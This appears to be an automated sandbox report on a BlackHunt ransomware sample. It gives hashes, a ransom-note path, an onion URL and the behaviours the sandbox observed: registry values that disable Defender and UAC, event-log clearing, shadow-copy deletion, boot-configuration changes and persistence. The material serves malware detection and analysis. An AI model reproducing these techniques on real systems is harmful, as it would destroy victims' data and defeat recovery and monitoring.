Analysis
-
max time kernel
143s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
19-01-2024 00:55
Static task
static1
Behavioral task
behavioral1
Sample
cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe
Resource
win10v2004-20231222-en
General
-
Target
cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe
-
Size
707KB
-
MD5
74693ed9bf52fe8dc5bd9f6fe21c124a
-
SHA1
3e04de70bf45e269774d7adba6180e5316df438b
-
SHA256
cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f
-
SHA512
eecd5fff0ed422f9a0828b283fc13804dcd09e56d84d42c6befcf83b433c51fa4073f576537c43df26dd7a632bb7b269601f3a6e99e70aff63953a7f6393f3fe
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1L8qvnh:6uaTmkZJ+naie5OTamgEoKxLW6kh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 6016 fsutil.exe 6308 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 556 wevtutil.exe 9632 wevtutil.exe 3316 wevtutil.exe 11952 wevtutil.exe 11776 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 6052 bcdedit.exe 5852 bcdedit.exe 2272 bcdedit.exe 4956 bcdedit.exe -
Renames multiple (3344) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 6384 wbadmin.exe 9288 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\M: cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened (read-only) \??\O: cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened (read-only) \??\H: cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened (read-only) \??\V: cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened (read-only) \??\G: cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened (read-only) \??\Z: cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened (read-only) \??\T: cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened (read-only) \??\U: cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened (read-only) \??\L: cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened (read-only) \??\R: cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened (read-only) \??\K: cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened (read-only) \??\N: cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened (read-only) \??\Y: cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened (read-only) \??\P: cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened (read-only) \??\X: cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened (read-only) \??\B: cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\Q: cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened (read-only) \??\I: cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened (read-only) \??\A: cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened (read-only) \??\S: cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened (read-only) \??\J: cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\giflib.md cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\root\#BlackHunt_Private.key cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\ro-ro\#BlackHunt_ReadMe.txt cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\es-es\#BlackHunt_Private.key cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\css\#BlackHunt_Private.key cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\de-de\#BlackHunt_Private.key cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-si\#BlackHunt_ReadMe.hta cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\cstm_brand_preview.png cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\nl-nl\#BlackHunt_ReadMe.hta cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\tr-tr\#BlackHunt_ReadMe.hta cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\#BlackHunt_ReadMe.txt cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\#BlackHunt_Private.key cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\#BlackHunt_ReadMe.txt cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\ICU\#BlackHunt_ReadMe.txt cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\new_icons.png cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_pt_135x40.svg cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_close.png cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\#BlackHunt_Private.key cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\#BlackHunt_Private.key cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ro-ro\#BlackHunt_Private.key cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\#BlackHunt_ReadMe.txt cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fi-fi\#BlackHunt_Private.key cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\#BlackHunt_ReadMe.hta cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-ma\#BlackHunt_ReadMe.txt cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\he-il\#BlackHunt_Private.key cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-fr\#BlackHunt_ReadMe.txt cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\amd64\#BlackHunt_ReadMe.hta cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\#BlackHunt_Private.key cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\#BlackHunt_ReadMe.txt cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\pt-br\#BlackHunt_ReadMe.hta cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\de-de\ui-strings.js cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened for modification C:\Program Files\7-Zip\Lang\el.txt cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ko-kr\#BlackHunt_ReadMe.txt cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_close.png cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\tr-tr\#BlackHunt_ReadMe.hta cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ro-ro\#BlackHunt_ReadMe.hta cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ca-es\ui-strings.js cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\#BlackHunt_ReadMe.hta cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\cs-cz\PlayStore_icon.svg cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\pl_get.svg cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\css\#BlackHunt_ReadMe.hta cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\#BlackHunt_ReadMe.hta cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#BlackHunt_Private.key cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-gb\#BlackHunt_ReadMe.txt cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nb-no\#BlackHunt_ReadMe.txt cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nb-no\#BlackHunt_ReadMe.txt cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#BlackHunt_Private.key cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\#BlackHunt_ReadMe.hta cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\nb-no\PlayStore_icon.svg cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Search.api cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\#BlackHunt_ReadMe.txt cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\core\#BlackHunt_ReadMe.txt cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ro-ro\#BlackHunt_Private.key cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ko-kr\#BlackHunt_Private.key cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\applet\#BlackHunt_ReadMe.txt cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\next-arrow-down.svg cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-down-pressed.gif cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\#BlackHunt_ReadMe.hta cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\ja-jp\#BlackHunt_Private.key cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\dd_arrow_small2x.png cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\#BlackHunt_Private.key cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\#BlackHunt_ReadMe.hta cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\back-arrow-disabled.svg cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 10000 8172 WerFault.exe 283 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 8320 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 6440 vssadmin.exe 6544 vssadmin.exe 6268 vssadmin.exe 6276 vssadmin.exe 7920 vssadmin.exe 6560 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 3888 taskkill.exe -
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 7804 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe Token: SeRestorePrivilege 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe Token: SeBackupPrivilege 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe Token: SeTakeOwnershipPrivilege 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe Token: SeAuditPrivilege 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe Token: SeSecurityPrivilege 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe Token: SeIncBasePriorityPrivilege 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe Token: SeBackupPrivilege 8252 vssvc.exe Token: SeRestorePrivilege 8252 vssvc.exe Token: SeAuditPrivilege 8252 vssvc.exe Token: SeBackupPrivilege 8336 wbengine.exe Token: SeRestorePrivilege 8336 wbengine.exe Token: SeSecurityPrivilege 8336 wbengine.exe Token: SeSecurityPrivilege 11776 wevtutil.exe Token: SeBackupPrivilege 11776 wevtutil.exe Token: SeSecurityPrivilege 11952 wevtutil.exe Token: SeBackupPrivilege 11952 wevtutil.exe Token: SeSecurityPrivilege 3316 wevtutil.exe Token: SeBackupPrivilege 3316 wevtutil.exe Token: SeSecurityPrivilege 556 wevtutil.exe Token: SeBackupPrivilege 556 wevtutil.exe Token: SeSecurityPrivilege 9632 wevtutil.exe Token: SeBackupPrivilege 9632 wevtutil.exe Token: SeDebugPrivilege 3888 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3684 wrote to memory of 1644 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 92 PID 3684 wrote to memory of 1644 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 92 PID 3684 wrote to memory of 4760 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 95 PID 3684 wrote to memory of 4760 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 95 PID 3684 wrote to memory of 1340 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 146 PID 3684 wrote to memory of 1340 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 146 PID 3684 wrote to memory of 640 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 149 PID 3684 wrote to memory of 640 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 149 PID 3684 wrote to memory of 2284 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 98 PID 3684 wrote to memory of 2284 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 98 PID 3684 wrote to memory of 1544 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 102 PID 3684 wrote to memory of 1544 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 102 PID 3684 wrote to memory of 1360 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 151 PID 3684 wrote to memory of 1360 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 151 PID 1644 wrote to memory of 1496 1644 cmd.exe 105 PID 1644 wrote to memory of 1496 1644 cmd.exe 105 PID 4760 wrote to memory of 384 4760 cmd.exe 171 PID 4760 wrote to memory of 384 4760 cmd.exe 171 PID 640 wrote to memory of 3176 640 cmd.exe 142 PID 640 wrote to memory of 3176 640 cmd.exe 142 PID 3684 wrote to memory of 2132 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 108 PID 3684 wrote to memory of 2132 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 108 PID 2284 wrote to memory of 1488 2284 cmd.exe 110 PID 2284 wrote to memory of 1488 2284 cmd.exe 110 PID 1340 wrote to memory of 1472 1340 cmd.exe 217 PID 1340 wrote to memory of 1472 1340 cmd.exe 217 PID 1544 wrote to memory of 1964 1544 cmd.exe 216 PID 1544 wrote to memory of 1964 1544 cmd.exe 216 PID 3684 wrote to memory of 1780 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 215 PID 3684 wrote to memory of 1780 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 215 PID 1360 wrote to memory of 2344 1360 reg.exe 111 PID 1360 wrote to memory of 2344 1360 reg.exe 111 PID 3684 wrote to memory of 468 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 115 PID 3684 wrote to memory of 468 3684 cc66ba5564bd55419845f899968bfea6b442203d82e1d6fdf9738d61e8ca223f.exe 115 PID 